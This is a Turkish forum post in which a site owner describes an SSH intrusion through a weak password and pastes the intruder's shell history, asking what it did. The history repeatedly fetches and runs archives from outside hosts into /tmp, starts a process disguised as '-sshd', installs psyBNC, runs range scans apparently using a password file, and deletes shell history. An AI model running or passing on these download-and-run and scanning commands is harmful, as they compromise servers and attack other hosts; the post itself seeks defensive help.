Merhaba bir sitemiz vardı boşta duran host açılırken
ssh erişimde açılmış nasıl olduysa
şifresi 123456 gibi basit birşeydi sanırım bulunması kolay olmustur.
içinde bilgi yok bomboş 200 mb lik bir site sadece htaccess yönlendirme ile yasaklanan bir siteyi basa siteye yönlendirmiştik
dün
ssh de who dedim ve o kullanıcının
ssh de oldugunu gördüm
ip adresi yabancıydı neyse
ssh den girip birşeyler kurmuş birşeyler yapmış 1- 1,5 AY önceleri fakat tam mana veremedim
ssh erişimi kapayıp şifre değiş
ip suppend ettim
aşagıdaki bir yıgın komutları kullanmış sizce ne yapmıs olabilir siteler açayıp kasıyordu dün hatta adım atamıyorduk desem yeri
Quote:
|
uptime dir cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd uname -a top su uptime ls cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd uptime cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd uptime cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd su dir uname -a cd /tmp wget http://bnc.acmeshells.com/psyBNC-2.3.2-7.tar.gz tar -zxf psyBNC-2.3.2-7.tar.gz cd psybnc make make menuconfig ./psybnc uname -a cd /tmp wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran wget postcard.100free.com/tr.tar tar xvf tr.tar mv tr pass_file ./start 125.214 ./start 195.174 ./start 195.175 ./start 194.54 uname -a ls cd /tmp/.bran ./start 208.83 ./start 78.185 ./start 77.245 uname -a uptime wget idol.altervista.org/f.gif tar xzvf f.gif wget http://cociulia.ilive.ro/allmechs.tar cd CIOCAN ./go 66.228 wget memorex.zzl.org/Jeka/newscaner.tgz uname-a uptime uname -a dir uptime cd /tmp wget branut.100free.com/2008.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp tar xvf 2008.tar wget branut.100free.com/2008.tar cd /tmp wget branut.100free.com/2008.tar tar xvf tr.tar tar tar -Acdtrux uname -a uptime dir cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /var/tmp wget branut.100free.com/2008.tar uname -a uptime cd /tmp tar xvf san4o.tar -sshd cd .." " PATH="." -sshd cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd uptime uname -a ls uptime uname -a ls uptime cd /tmp wget http://bnc.acmeshells.com/psyBNC-2.3.2-7.tar.gz tar -zxf psyBNC-2.3.2-7.tar.gz cd psybnc make make menuconfig uptime cd /tmp wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran wget postcard.100free.com/tr.tar tar xvf tr.tar mv tr pass_file ./start 193.140 ./start 212.175 ./start 78.184 ./start ./start 78.183 ./start 78.182 ./start 88.242 ./start 88.241 ./start 88.233 ./start 59.182 ./start 212.115 ./start 212.252 ./start 212.33 ./start 212.57 ./start 212.98 ./start 89.19 ./start 212.174 ./start 88.255 ./start 78.166 ./start 78.184 ./start 78.190 ./start 202.125 cd /tmp/.bran ./start 62.244 uptime cd /tmp wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran rm -rf .bot rm -rf pass_file wget postcard.100free.com/br.tar tar xvf br.tar ./start 146.164 ./start 147.65 ./start 192.188 ./start 147.65 ./start 143.108 ./start 200.216 ./start 189.10 cd .bran cd /tmp tar xvf br.tar cd .bran tar xvf br.tar ./start 189.10 cd /tmp tar xvf br.tar cd .bran tar xvf br.tar ./start 200.212 cd .bran cd /tmp cd .bran tar xvf br.tar ./start 150.161 ./start 143.108 ./start 143.108 ./start 189.6 ./start 189.12 ./start 189.17 ./start 189.21 ./start 189.22 ./start 189.29 uptime cd /tmp cd .bran tar xvf br.tar ./start 189.37 ./start 161.148 ./start 139.82 ./start 208.70 cd /tmp cd .bran tar xvf br.tar ./start 146.164 cd /tmp cd .bran tar xvf br.tar ./start 201.3 cd .bran cd /tmp cd .bran tar xvf br.tar ./start 201.16 cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit uptime ls cd /tmp ls wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran rm -rf .bot rm -rf pass_file wget postcard.100free.com/br.tar tar xvf br.tar ./start 189.27 ./start 189.58 cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp cd .bran tar xvf br.tar ./start 201.77 ./start 205.169 ./start 209.133 cd /tmp cd .bran tar xvf br.tar ./start 209.133 ./start 209.13 ./start 209.131 ./start 209.132 uptime uname -a cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp tar xvf 2008.tar wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran rm -rf .bot rm -rf pass_file wget postcard.100free.com/br.tar tar xvf br.tar ./start 189.27 ./start 74.53 cd /tmp cd .bran tar xvf br.tar ./start 74.56 cd .bran tar xvf 2008.tar cd /tmp cd .bran tar xvf br.tar ./start 74.52 cd /tmp cd .bran tar xvf br.tar ./start 74.52 cd /tmp cd .bran tar xvf br.tar ./start 74.59 ./start 74.62 uptime cd /tmp cd .bran tar xvf br.tar ./start 74.33 ./start 212.160 ./start 212.134 cd /tmp cd .bran tar xvf br.tar ./start 206.162 ./start 206.163 ./start 206.198 ./start 206.111 ./start 206.113 ./start 206.117 ./start 206.119 ./start 74.119 cd /tmp cd .bran tar xvf br.tar ./start 74.154 ./start 211.136 cd /tmp cd .bran tar xvf br.tar ./start 84.17 uptime uname -a cd /tmp cd .bran tar xvf br.tar ./start 75.151 ./start 75.152 ./start 75.149 ./start 75.148 ./start 75.147 cd /tmp cd .bran tar xvf br.tar ./start 93.122 ./start 193.227 ls dir uptime cd /tmp cd .bran tar xvf br.tar ./start 150.162 cd /tmp cd .bran tar xvf br.tar ./start 143.108 cd /tmp cd .bran tar xvf br.tar ./start 143.108 ./start 146.164 cd /tmp cd .bran tar xvf br.tar ./start 143.108 ./start 146.164 ./start 143.139 cd /tmp cd .bran tar xvf br.tar ./start 150.163 ./start 200.209 ./start 190.246 ./start 190.24 ./start 190.23 ./start 65.116 cd /tmp cd .bran tar xvf br.tar ./start 208.73 cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd history history
|